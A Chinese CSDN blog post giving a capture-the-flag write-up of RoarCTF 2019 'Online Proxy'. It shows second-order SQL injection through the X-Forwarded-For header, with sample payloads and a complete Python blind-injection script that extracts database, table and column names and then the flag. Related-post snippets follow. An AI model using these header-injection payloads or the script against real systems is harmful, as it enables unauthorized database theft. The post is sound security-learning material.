[RoarCTF 2019]Online Proxy --不会编程的崽

于 2024-03-29 07:00:00 发布
阅读量828 收藏 4
点赞数 28
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/137114255
版权

这几天也是ctf做得有点头疼了。好些序列化的题没碰,一直做些sql注入类的题目。闲来无事,在更一次sql注入吧。

整个页面就这点信息。首先想想为什么他能获取你的ip。猜测是数据包X-Forwarded-For。 

 

它还输出上次访问页面客户端的ip。很明显了,多半是二次注入

X-Forwarded-For:0'or 1 or'0

当构造这样的payload的时候。

1.先构造payload,点击发送

2.在换一个随便的ip,点击发送 

3.在次点击发送

last ip就变成1了。说明的确是sql二次注入 

这个原理就和上次网鼎杯那个sql注入一样。要是使用传统的注入就太慢了。因此我们构造这样的payload

0'+ (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),1,1))) +'0

sql语句的含义是将数据库的第一个字母的ascii码于0相加。(mysql数据库+是运算符)

 这个last ip就等于105了。这关也没过滤啥。通过这个方法,就可以构造脚本了。

import requests
flag=''
url='http://node5.buuoj.cn:25578/'
for i in range(1,500):
    s=requests.session()
    # (ASCII(SUBSTR((select group_concat(schema_name) from information_schema.schemata),{},1)))
    # (ASCII(SUBSTR((select(group_concat(table_name))FROM(information_schema.TABLES)where(table_schema)='F4l9_D4t4B45e'),{},1)))
    # F4l9_t4b1e
    # (ASCII(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_name="F4l9_t4b1e")),{},1)))
    # F4l9_C01uMn
    # (ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_t4b1e)),1,1)))
    headers={
        "X-Forwarded-For":"0'+(ASCII(SUBSTR((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{},1)))+'0".format(i),
        'Cookie':'_ga=GA1.1.1748561756.1709982957; _ga_0WLTHS96P4=GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid=87ee5b24-ee01-43dc-ee18-fca0644f3e53'
    }
    headers1={
        "X-Forwarded-For":"1",
        'Cookie':'_ga=GA1.1.1748561756.1709982957; _ga_0WLTHS96P4=GS1.1.1709982957.1.1.1709982979.0.0.0; track_uuid=87ee5b24-ee01-43dc-ee18-fca0644f3e53'
    }
    data=s.get(url,headers=headers)
    data1=s.get(url,headers=headers1)
    data2=s.get(url,headers=headers1)
    y=data2.text
    x=y.split('\n')[-1]
    z=x[9:]
    flag=flag+chr(int(z.split(' ')[0]))
    print(flag)

最后还要注意的一点就是,这里是跨库查询。flag不在当前数据库。我们第一步必须要先爆库名。 

最后一步获取数据是也别忘记"F4l9_D4t4B45e.F4l9_t4b1e",代表F4l9_D4t4B45e数据库下的F4l9_t4b1e表。

这就是最后跑出来的结果了 

不会编程的崽
关注
  • 28
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[RoarCTF 2019]Online Proxy
m0_63045593的博客
04-22 1900
[RoarCTF 2019]Online Proxy <!-- Debug Info: Duration: 0.40283489227295 s Current Ip: 10.244.80.46 --> 看到ip联系一下 xff(识别ip的)可以自己修改 新知识点 一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。 跟SQL有关 挨个测试为单引号闭合 执行原理 数据在写入数据库时 1.127.0.0.1‘or’1在写入时为 Current
influx-proxy-2.5.7-linux-amd64.tar.gz
12-16
本文将详细探讨InfluxDB的核心特性和Influx-proxy的功能,并结合"Influx-proxy-2.5.7-linux-amd64.tar.gz"这个压缩包文件,解析其在Linux AMD64平台上可能的部署与使用。 首先,InfluxDB以其高效的存储和查询机制而...
charles-proxy-4.6.2-win64.msi
01-02
Charles(charles-proxy-4.6.2-win64.msi官方下载试用30天Windows 64位版本) 是在您自己的计算机上运行的 Web 代理(HTTP 代理/ HTTP 监视器)。然后,您的网络浏览器(或任何其他互联网应用程序)被配置为通过 ...
charles-proxy-4.5.6-win64.msi
12-21
charles-proxy-4.5.6-win64.msi
browsermob-proxy-2.1.4-bin.zip
07-24
代理服务器 BrowserMob Proxy,BrowserMob Proxy 简称 BMP,可以这么说,BMP 绝对是为 Selenium 为生的,Selenium + BMP 的完美搭配,可以实现很多你绝对想象不出来的功能
ios-webkit-debug-proxy-1.9.0-win64-bin
最新发布
07-19
ios-webkit-debug-proxy-1.9.0-win64-bin
Waysonline 突破局域网限制 可有免费时间
08-14
直接双击运行waysonline.exe,在弹出的网页窗口输入你在waysonline的帐号和密码(可免费注册),非会员请选择[公众服务区/PUBLIC GATEWAY]。登录成功以后,单击V3任务栏绿色小图标: 运行: - 方式1:用v3启动你希望代理的程序。 点击[运行程序/Start New Application],若只需代理游戏数据,不需要代理网页流量,选[除Web以外/Bypass Web Traffic](此为或双击图标时的默认方式),节省连接数及带宽,否则选[全部网络通讯/Include All Traffic]。在打开文件窗口里,选择要运行的应用、游戏程序或快捷方式,[打开]后即开始运行该程序,并通过Waysonline服务器进行通讯。 - 方式2:从正在运行的进程里面选择一个。 点击[选择进程/Attach to Process],在进程列表里选择希望代理的进程。当程序发起新建的网络连接时,就会通过V3代理出去。对于通过v3启动拦截无效的情况,可采用本方式,此方式对已经建立的连接并无作用。若你希望默认代理之后所有运行的程序,可以添加"Explorer.exe"进程。 成功: 当程序开始网络访问后,任务栏上V3小图标应有连接数以及数据变化。若你不希望某些程序使用V3代理,请在[选择进程]列表里移除当前运行的程序。该程序以后将不会通过V3代理,直至你重新添加。
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 608
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 943
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
几个在线的web代理
weixin_34186128的博客
08-14 769
http://www.cemsg.com/web/ http://pooling.info http://proxyol.com http://www.haozs.net/Proxyonline.htm http://web.proxycn.com/
内网穿透神器 NeutrinoProxy 1.8.0 版本发布
BASK2311的博客
04-06 1486
笔者时间、能力有限,且开源项目非一朝一夕之事,存在众多问题亦在所难免。使用、学习过程中有任何问题欢迎大家与我联系。更多使用姿势、细节请通过官网或结尾微信二维码加我备注"中微子代理"入群交流。对项目有什么想法或者建议,可以加我微信拉交流群,或者创建。1.1、 Docker一键部署。1.2、使用jar包自行部署。使用默认sqlite数据库。指定自己的mysql数据库。指定版本安装,推荐使用。
[RoarCTF 2019]Online Proxy 盲注
scrawman的博客
01-26 3095
[RoarCTF 2019]Online Proxy bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。 盲注: import requests url = "http://node4.buuoj.cn:26940//" head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
[RoarCTF 2019] Easy Calc
veinard_F的博客
06-05 278
打开题目后是一个计算的页面,通过尝试发现只能计算数字 查看页面源码 根据框出的部分可以访问一下calc.php,得到隐藏信息 从代码中可以知道绕过waf之后会有一个eval执行函数 首先说一下对于waf的绕过,由于php在执行的时候会自动忽略掉空格字符,包含换行回车等,而waf不可以,所以可以构造一个payload为 ?num=var_dump(scandir(chr(47))) 出现了f1a...
安装 http-proxy-middleware 模块的http-proxy-middleware是什么
07-15
`http-proxy-middleware` 是一个 Node.js 模块,它是一个简化的 HTTP 代理中间件,用于在 Node.js 服务器中代理和转发 HTTP 请求。它可以帮助你在开发环境中实现请求的转发和代理,以解决跨域访问的问题。 具体来说...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值